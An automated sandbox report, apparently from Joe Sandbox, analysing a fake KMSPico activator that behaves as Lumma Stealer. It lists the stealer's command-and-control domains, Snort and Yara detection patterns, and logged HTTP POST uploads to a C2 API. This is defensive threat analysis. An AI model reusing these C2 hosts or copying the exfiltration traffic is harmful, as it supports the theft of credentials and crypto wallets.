Edit tour

Windows Analysis Report
KMSPico.exe

Overview

General Information

Sample name:KMSPico.exe
Analysis ID:1400640
MD5:e46fcde17771922059b7a826ec4e4ca3
SHA1:c7ade612e6053c7652698d431f59c7ed43a57f19
SHA256:e2e733137df2e1a7d726335f8ae4d1b4ce83ef2d1d3db2651c23db1a24c918f0
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • KMSPico.exe (PID: 3648 cmdline: C:\Users\user\Desktop\KMSPico.exe MD5: E46FCDE17771922059B7A826EC4E4CA3)
    • WerFault.exe (PID: 5276 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 1644 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{
  "C2 url": [
    "associationokeo.shop",
    "turkeyunlikelyofw.shop",
    "pooreveningfuseor.pw",
    "detectordiscusser.shop",
    "problemregardybuiwo.fun",
    "technologyenterdo.shop"
  ]
}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2258987153.000000000252F000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0xe18:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.2258808314.00000000024A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: KMSPico.exe PID: 3648JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: KMSPico.exe PID: 3648JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            No Sigma rule has matched
            Timestamp:02/29/24-01:47:53.832376
            SID:2051001
            Source Port:49705
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:02/29/24-01:48:00.206830
            SID:2051001
            Source Port:49710
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:02/29/24-01:47:59.419425
            SID:2051001
            Source Port:49709
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:02/29/24-01:47:53.145475
            SID:2050998
            Source Port:64821
            Destination Port:53
            Protocol:UDP
            Classtype:A Network Trojan was detected
            Timestamp:02/29/24-01:48:01.392463
            SID:2051001
            Source Port:49711
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:02/29/24-01:47:53.047409
            SID:2050955
            Source Port:58632
            Destination Port:53
            Protocol:UDP
            Classtype:A Network Trojan was detected
            Timestamp:02/29/24-01:47:53.254875
            SID:2051001
            Source Port:49704
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:02/29/24-01:47:55.834473
            SID:2051001
            Source Port:49707
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:02/29/24-01:47:56.787043
            SID:2051001
            Source Port:49708
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:02/29/24-01:47:54.800926
            SID:2051001
            Source Port:49706
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: KMSPico.exeAvira: detected
            Source: problemregardybuiwo.funAvira URL Cloud: Label: malware
            Source: associationokeo.shopAvira URL Cloud: Label: malware
            Source: turkeyunlikelyofw.shopAvira URL Cloud: Label: malware
            Source: https://technologyenterdo.shop/apiAvira URL Cloud: Label: malware
            Source: KMSPico.exe.3648.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "detectordiscusser.shop", "problemregardybuiwo.fun", "technologyenterdo.shop"]}
            Source: technologyenterdo.shopVirustotal: Detection: 16%Perma Link
            Source: problemregardybuiwo.funVirustotal: Detection: 17%Perma Link
            Source: problemregardybuiwo.funVirustotal: Detection: 17%Perma Link
            Source: pooreveningfuseor.pwVirustotal: Detection: 14%Perma Link
            Source: technologyenterdo.shopVirustotal: Detection: 16%Perma Link
            Source: turkeyunlikelyofw.shopVirustotal: Detection: 19%Perma Link
            Source: associationokeo.shopVirustotal: Detection: 19%Perma Link
            Source: detectordiscusser.shopVirustotal: Detection: 18%Perma Link
            Source: https://technologyenterdo.shop/Virustotal: Detection: 15%Perma Link
            Source: https://technologyenterdo.shop/yVirustotal: Detection: 15%Perma Link
            Source: https://technologyenterdo.shop/apiVirustotal: Detection: 18%Perma Link
            Source: https://technologyenterdo.shop/apisVirustotal: Detection: 14%Perma Link
            Source: KMSPico.exeReversingLabs: Detection: 36%
            Source: KMSPico.exeVirustotal: Detection: 45%Perma Link
            Source: KMSPico.exeJoe Sandbox ML: detected

            Compliance

            barindex
            Source: C:\Users\user\Desktop\KMSPico.exeUnpacked PE file: 0.2.KMSPico.exe.400000.0.unpack
            Source: KMSPico.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49711 version: TLS 1.2

            Networking

            barindex
            Source: TrafficSnort IDS: 2050955 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (problemregardybuiwo .fun) 192.168.2.5:58632 -> 1.1.1.1:53
            Source: TrafficSnort IDS: 2050998 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (technologyenterdo .shop) 192.168.2.5:64821 -> 1.1.1.1:53
            Source: TrafficSnort IDS: 2051001 ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) 192.168.2.5:49704 -> 104.21.80.118:443
            Source: TrafficSnort IDS: 2051001 ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) 192.168.2.5:49705 -> 104.21.80.118:443
            Source: TrafficSnort IDS: 2051001 ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) 192.168.2.5:49706 -> 104.21.80.118:443
            Source: TrafficSnort IDS: 2051001 ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) 192.168.2.5:49707 -> 104.21.80.118:443
            Source: TrafficSnort IDS: 2051001 ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) 192.168.2.5:49708 -> 104.21.80.118:443
            Source: TrafficSnort IDS: 2051001 ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) 192.168.2.5:49709 -> 104.21.80.118:443
            Source: TrafficSnort IDS: 2051001 ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) 192.168.2.5:49710 -> 104.21.80.118:443
            Source: TrafficSnort IDS: 2051001 ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) 192.168.2.5:49711 -> 104.21.80.118:443
            Source: Malware configuration extractorURLs: associationokeo.shop
            Source: Malware configuration extractorURLs: turkeyunlikelyofw.shop
            Source: Malware configuration extractorURLs: pooreveningfuseor.pw
            Source: Malware configuration extractorURLs: detectordiscusser.shop
            Source: Malware configuration extractorURLs: problemregardybuiwo.fun
            Source: Malware configuration extractorURLs: technologyenterdo.shop
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: technologyenterdo.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: technologyenterdo.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 13678Host: technologyenterdo.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 16221Host: technologyenterdo.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20565Host: technologyenterdo.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7086Host: technologyenterdo.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1256Host: technologyenterdo.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 591913Host: technologyenterdo.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownDNS traffic detected: queries for: problemregardybuiwo.fun
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: technologyenterdo.shop
            Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
            Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2036088652.0000000004B36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2036088652.0000000004B36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2036088652.0000000004B36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: KMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: KMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: KMSPico.exe, 00000000.00000003.2120848837.0000000002586000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259172539.00000000025EC000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2063814248.0000000002602000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2053752009.0000000002601000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2089735243.0000000002601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://technologyenterdo.shop/
            Source: KMSPico.exe, 00000000.00000003.2066524885.0000000002604000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2063814248.0000000002602000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://technologyenterdo.shop/&
            Source: KMSPico.exe, 00000000.00000003.2034989504.0000000002593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://technologyenterdo.shop/1
            Source: KMSPico.exe, 00000000.00000003.2053752009.0000000002601000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2089735243.0000000002601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://technologyenterdo.shop/?
            Source: KMSPico.exe, 00000000.00000003.2121001865.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259172539.00000000025EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://technologyenterdo.shop/J
            Source: KMSPico.exe, 00000000.00000003.2121026380.00000000025F8000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2063814248.0000000002602000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2054906395.0000000002604000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2053752009.0000000002601000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2089735243.0000000002601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://technologyenterdo.shop/api
            Source: KMSPico.exe, 00000000.00000003.2034989504.0000000002593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://technologyenterdo.shop/apie
            Source: KMSPico.exe, 00000000.00000003.2090458724.0000000002604000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2082443424.0000000002604000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2066524885.0000000002604000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2063814248.0000000002602000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2089735243.0000000002601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://technologyenterdo.shop/apik4
            Source: KMSPico.exe, 00000000.00000003.2121121404.0000000002606000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2121001865.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259320177.0000000002607000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2121026380.00000000025F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://technologyenterdo.shop/apis
            Source: KMSPico.exe, 00000000.00000003.2120848837.0000000002586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://technologyenterdo.shop/y
            Source: KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: KMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
            Source: KMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
            Source: KMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: KMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: KMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
            Source: KMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownHTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49711 version: TLS 1.2

            System Summary

            barindex
            Source: 00000000.00000002.2258987153.000000000252F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.2258808314.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14C300_3_04B14C30
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14C300_3_04B14C30
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14C300_3_04B14C30
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14C210_3_04B14C21
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14C210_3_04B14C21
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14C210_3_04B14C21
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14E680_3_04B14E68
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14E680_3_04B14E68
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14E680_3_04B14E68
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14C300_3_04B14C30
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14C300_3_04B14C30
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14C300_3_04B14C30
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14C210_3_04B14C21
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14C210_3_04B14C21
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14C210_3_04B14C21
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14E680_3_04B14E68
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14E680_3_04B14E68
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14E680_3_04B14E68
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14C300_3_04B14C30
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14C300_3_04B14C30
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14C300_3_04B14C30
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14C210_3_04B14C21
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14C210_3_04B14C21
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14C210_3_04B14C21
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14E680_3_04B14E68
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14E680_3_04B14E68
            Source: C:\Users\user\Desktop\KMSPico.exeCode function: 0_3_04B14E680_3_04B14E68
            Source: C:\Users\user\Desktop\KMSPico.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 1644
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: ncrypt.dllJump to behavior
